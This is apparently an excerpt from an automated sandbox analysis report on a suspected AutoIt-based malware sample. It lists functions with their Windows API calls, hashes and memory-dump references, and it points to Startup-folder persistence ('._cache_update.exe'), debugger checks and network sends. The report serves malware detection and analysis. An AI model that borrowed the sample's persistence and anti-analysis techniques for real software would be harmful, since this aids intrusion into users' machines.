                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                • API String ID: 1029625771-2684727018
                                                                                                                                • Opcode ID: a67e0e5a9157c047b1a1be217f02e58e18f5045c395367ed1a0a6929274e2dde
                                                                                                                                • Instruction ID: 28bbf8fb447551a0daee8fb7adec422551bc8a69e1968057fc9199709b8bda8c
                                                                                                                                • Opcode Fuzzy Hash: a67e0e5a9157c047b1a1be217f02e58e18f5045c395367ed1a0a6929274e2dde
                                                                                                                                • Instruction Fuzzy Hash: 57F01871D0420DAE9F11FFB4DC519FFB778AA10310F508526F81692192EB389B49FB61
                                                                                                                                Function 00F8813B Relevance: 3.2, APIs: 2, Instructions: 212COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                • Opcode ID: 73a37d4fc03472a1696044df8d6df72a79e3ad2b800f5a7e560e8a8dfc626870
                                                                                                                                • Instruction ID: 02f280286315574434d0a9fda42c373a3ca44e4fab2d28e3dfbb9dd62071670c
                                                                                                                                • Opcode Fuzzy Hash: 73a37d4fc03472a1696044df8d6df72a79e3ad2b800f5a7e560e8a8dfc626870
                                                                                                                                • Instruction Fuzzy Hash: FF818275D00126DBCB20DF58D880AADB7B2FF54320F64851AE8459B351D739ED92EB90
                                                                                                                                Function 00F2F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72cbc5725d37325f99d3b60b91beff4aa40b58658344523a0225eac1561fa379
                                                                                                                                • Instruction ID: 67fcb7b00194d2756962aefefbe449b0714bc4f8faf65eb8d7ba67ede2c0d84f
                                                                                                                                • Opcode Fuzzy Hash: 72cbc5725d37325f99d3b60b91beff4aa40b58658344523a0225eac1561fa379
                                                                                                                                • Instruction Fuzzy Hash: 8351B8316043019FCB14FF14D891BAA73E5AF84324F54857DF95A8B292DF34E849EB91
                                                                                                                                Function 00F68065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCursorPos.USER32(?), ref: 00F68074
                                                                                                                                • GetForegroundWindow.USER32 ref: 00F6807A
                                                                                                                                  • Part of subcall function 00F66B19: GetWindowRect.USER32(?,?), ref: 00F66B2C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CursorForegroundRect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1066937146-0
                                                                                                                                • Opcode ID: 1bcd1c04d542f2cf86108b9cfaca83096efbafe188125b7ed36e26429e73fc9d
                                                                                                                                • Instruction ID: 5073e341645d546db546c6b353d01557a08db8f45dee78d7660a9e478ac398c3
                                                                                                                                • Opcode Fuzzy Hash: 1bcd1c04d542f2cf86108b9cfaca83096efbafe188125b7ed36e26429e73fc9d
                                                                                                                                • Instruction Fuzzy Hash: D2317275900218AFDB00EFA4DC81BEEB7B4FF05314F10412AE915A7251DB38AE45EB91
                                                                                                                                Function 00F11DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • IsWindow.USER32(00000000), ref: 00F8DB31
                                                                                                                                • IsWindow.USER32(00000000), ref: 00F8DB6B
                                                                                                                                  • Part of subcall function 00F11F04: GetForegroundWindow.USER32 ref: 00F11FBE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Foreground
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 62970417-0
                                                                                                                                • Opcode ID: 31dfc7d1ceb292078604d3effda8f261f575611de843100eff1db759d9e4c2cc
                                                                                                                                • Instruction ID: 698d14666b2eb04e1914edf0eb9eac75ffce93cd78222faa2c1ded3bbbd09fff
                                                                                                                                • Opcode Fuzzy Hash: 31dfc7d1ceb292078604d3effda8f261f575611de843100eff1db759d9e4c2cc
                                                                                                                                • Instruction Fuzzy Hash: E2219072600206ABDB10AB74CC51BFE77B9AF80794F100429FA5AC7181DB78ED45A760
                                                                                                                                Function 00F4E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F11952
                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F4E344
                                                                                                                                • _strlen.LIBCMT ref: 00F4E34F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout_strlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2777139624-0
                                                                                                                                • Opcode ID: 6bf6aa8682c21a0c9a1e35f5df9225fa26d816fab0d8598e231859654558ea15
                                                                                                                                • Instruction ID: 908fcb2fcf71eeaef69bb5fab2ec3ab48be010c434e5c4a09d0793e976fa6960
                                                                                                                                • Opcode Fuzzy Hash: 6bf6aa8682c21a0c9a1e35f5df9225fa26d816fab0d8598e231859654558ea15
                                                                                                                                • Instruction Fuzzy Hash: 2A11A33160020467CB05BF68DC969FE7FA8AF45750F00443AFA069B192DE699845B7A4
                                                                                                                                Function 00F13682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • 745EC8D0.UXTHEME ref: 00F136E6
                                                                                                                                  • Part of subcall function 00F32025: __lock.LIBCMT ref: 00F3202B
                                                                                                                                  • Part of subcall function 00F132DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F132F6
                                                                                                                                  • Part of subcall function 00F132DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F1330B
                                                                                                                                  • Part of subcall function 00F1374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00F1376D
                                                                                                                                  • Part of subcall function 00F1374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00F1377F
                                                                                                                                  • Part of subcall function 00F1374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00FD1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00FD1124,?,?), ref: 00F137EE
                                                                                                                                  • Part of subcall function 00F1374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00F13860
                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00F13726
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3809921791-0
                                                                                                                                • Opcode ID: 138618b3e58f0b0ea171c6cd02986b3c7a459c13686c3cab965d0a1d9a43253a
                                                                                                                                • Instruction ID: e6ff323504d42ffc3864a13015e899e6a896d056da19a6e8a19f84c79a39e0a2
                                                                                                                                • Opcode Fuzzy Hash: 138618b3e58f0b0ea171c6cd02986b3c7a459c13686c3cab965d0a1d9a43253a
                                                                                                                                • Instruction Fuzzy Hash: 5511AEB1908344ABC310EF69ED0990ABBE9FF94710F00451FF445832A1DB749584EB92
                                                                                                                                Function 00F14B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00F14C2B,?,?,?,?,00F1BE63), ref: 00F14BB6
                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00F14C2B,?,?,?,?,00F1BE63), ref: 00F84972
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: d5815f9b25ae3a04d815ec4218d0ad2551d1d92ea99a2bd2963e8fefd2384c99
                                                                                                                                • Instruction ID: 766080b7a974978797f4d889ba6a60752f2f7343bb04e865c77d050fe3b98846
                                                                                                                                • Opcode Fuzzy Hash: d5815f9b25ae3a04d815ec4218d0ad2551d1d92ea99a2bd2963e8fefd2384c99
                                                                                                                                • Instruction Fuzzy Hash: 31019671548308BEF3349E24CC8AFA63BDCEB45778F208315FAE45A1E0C6B46C84AB14
                                                                                                                                Function 00F2F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00F5AEA5,?,?,00000000,00000008), ref: 00F2F282
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00F5AEA5,?,?,00000000,00000008), ref: 00F2F2A6
                                                                                                                                  • Part of subcall function 00F2F2D0: _memmove.LIBCMT ref: 00F2F307
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3033907384-0
                                                                                                                                • Opcode ID: 6bd5636e8af0307ad85dfcf7bb6b6517de9703c73164d18f49b265166e132d54
                                                                                                                                • Instruction ID: 41a2a013e98da211ad07fd6fb50eaea8a2f9d0ed319e0cf1c3d37dedc2fff2dc
                                                                                                                                • Opcode Fuzzy Hash: 6bd5636e8af0307ad85dfcf7bb6b6517de9703c73164d18f49b265166e132d54
                                                                                                                                • Instruction Fuzzy Hash: E7F04FB6514114BFAB10ABA5EC44DBB7FADEF8A3607108036FD08CA151CA35DC40A674
                                                                                                                                Function 00F3F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ___lock_fhandle.LIBCMT ref: 00F3F7D9
                                                                                                                                • __close_nolock.LIBCMT ref: 00F3F7F2
                                                                                                                                  • Part of subcall function 00F3886A: __getptd_noexit.LIBCMT ref: 00F3886A
                                                                                                                                  • Part of subcall function 00F3889E: __getptd_noexit.LIBCMT ref: 00F3889E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1046115767-0
                                                                                                                                • Opcode ID: 006af05f261c15af640fc2726daca5168d8229531d9e212fea7113ab8d14fd11
                                                                                                                                • Instruction ID: c2dc9bd839de7f0e64b6f833f97a820d9e4b2ebf7b696d087a708fa7290f22c0
                                                                                                                                • Opcode Fuzzy Hash: 006af05f261c15af640fc2726daca5168d8229531d9e212fea7113ab8d14fd11
                                                                                                                                • Instruction Fuzzy Hash: 8D11CE72C06B149EDB157F78DC423587BA06F42331F660260E5209F2E3CBBC9905B6A2
                                                                                                                                Function 00F69500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • send.WS2_32(00000000,?,00000000,00000000), ref: 00F69534
                                                                                                                                • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00F69557
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastsend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1802528911-0
                                                                                                                                • Opcode ID: 46f6545d995cffc9a2b05f5364d8b9f404265d193fd3eba48bcc30ae8d7d1c61
                                                                                                                                • Instruction ID: d254e22bc3e64c6ca1e0bde9bea32fca76e7009f3ae65c7baffa91d0aacb41fd
                                                                                                                                • Opcode Fuzzy Hash: 46f6545d995cffc9a2b05f5364d8b9f404265d193fd3eba48bcc30ae8d7d1c61
                                                                                                                                • Instruction Fuzzy Hash: 460184352002009FC710DF64DC51B6AB7E9EF89721F14811EFA5A87391CB74EC05DB51
                                                                                                                                Function 00F34274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F3889E: __getptd_noexit.LIBCMT ref: 00F3889E
                                                                                                                                • __lock_file.LIBCMT ref: 00F342B9
                                                                                                                                  • Part of subcall function 00F35A9F: __lock.LIBCMT ref: 00F35AC2
                                                                                                                                • __fclose_nolock.LIBCMT ref: 00F342C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2800547568-0
                                                                                                                                • Opcode ID: 43c4829d5c135769d1bd3eee1361f2bb9baf4cab6c65af151b5edc4cdebce16b
                                                                                                                                • Instruction ID: 0029fa16f0e768244f8506e7c798fb0e60fec679a97dc7c19538a6e8f283728a
                                                                                                                                • Opcode Fuzzy Hash: 43c4829d5c135769d1bd3eee1361f2bb9baf4cab6c65af151b5edc4cdebce16b
                                                                                                                                • Instruction Fuzzy Hash: F5F090718057099ADB20BB758C02B5F77D06F41334F218209B824AB1C1CB7CF901BB51
                                                                                                                                Function 00F2F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • timeGetTime.WINMM ref: 00F2F57A
                                                                                                                                  • Part of subcall function 00F1E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E279
                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00F875D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePeekSleepTimetime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1792118007-0
                                                                                                                                • Opcode ID: 70a3c240c7c8e3e284a6c21b799fc7e58ed5266c396a6af2d1e47e878020da3a
                                                                                                                                • Instruction ID: 6849f287120408fac5dde38cb2962c5019d15f2af3d193f53a6371437ba4d1f3
                                                                                                                                • Opcode Fuzzy Hash: 70a3c240c7c8e3e284a6c21b799fc7e58ed5266c396a6af2d1e47e878020da3a
                                                                                                                                • Instruction Fuzzy Hash: 19F08C712442199FD314EF69E805BD6BBE8AF49320F00003AF819DB251DB70A840EBD1
                                                                                                                                Function 00F24040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
